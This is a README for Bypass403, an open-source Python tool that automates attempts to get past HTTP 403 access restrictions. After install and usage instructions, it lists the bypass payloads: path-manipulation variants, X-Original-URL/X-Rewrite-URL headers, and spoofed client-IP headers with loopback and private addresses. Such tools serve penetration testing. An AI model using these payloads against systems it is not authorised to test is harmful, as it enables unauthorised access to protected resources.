Bypass403 automates the techniques used to circumvent access control restrictions on target pages. Bypass403 will continue to be improved and it is open to contributions.
- Clone the repository to your machine.
git clone https://github.com/hackelite01/Bypass403.git - Install required modules by running the code
pip install -r requirements.txt - READY!
Arguments:
| Argument | Description | Examples | Note |
|---|---|---|---|
| -u | single URL to scan | http://example.com or http://example.com/ | All these example usages are interpreted in the same way |
| -U | path to list of URLs | ./urllist.txt, ../../urllist.txt, etc. | Just provide the path where the file is located :) |
| -d | single directory to scan | admin or /admin or admin/ or /admin/ | All these example usages are interpreted in the same way |
| -D | path to list of directories | ./dirlist.txt, ../../dirlist.txt, etc. | Just provide the path where the file is located :) |
Usage 1: python3 403bypasser.py -u https://example.com -d /secret
Usage 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Usage 3: python3 403bypasser.py -U urllist.txt -d /secret
Usage 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
IMPORTANT NOTE: All the followings are interpreted the same. Therefore, which pattern you use is just a matter of preference.
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secret
ALL THE SAME!
The output of the program is saved (in the current directory) in a file with the name of the domain name given as input.
For example:
python3 403bypasser.py -u https://example.com -d /secret is given. Then the output is saved to example.txt in the current directory.
Changes in v2.0: Considerable changes have been done in this version. The project is completely moved to Python 3 from Bash. New and wide variety of techniques have been added.
Changes in v1.1: It's now possible to pass files (lists) to Bypass403 as input via arguments. Furthermore, two more test cases added:
poisoning with 1)X-Original-URL and 2)X-Rewrite-URL headers.
- GUI
- Add Rate-Limit / Threads Option
- Add an Option for Scan Types (fast, normal, aggressive or only path manipulation / header manipulation)
- Export cURL Command for Each Request
- Add Parameters to Save Output According to HTTP Status Codes
- Add Parameters to Save Output According to Page Size Anomalies
- Convert GET request to POST request
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./
X-Original-URL: /secretX-Rewrite-URL: /secret
Headers:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IP
Values:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1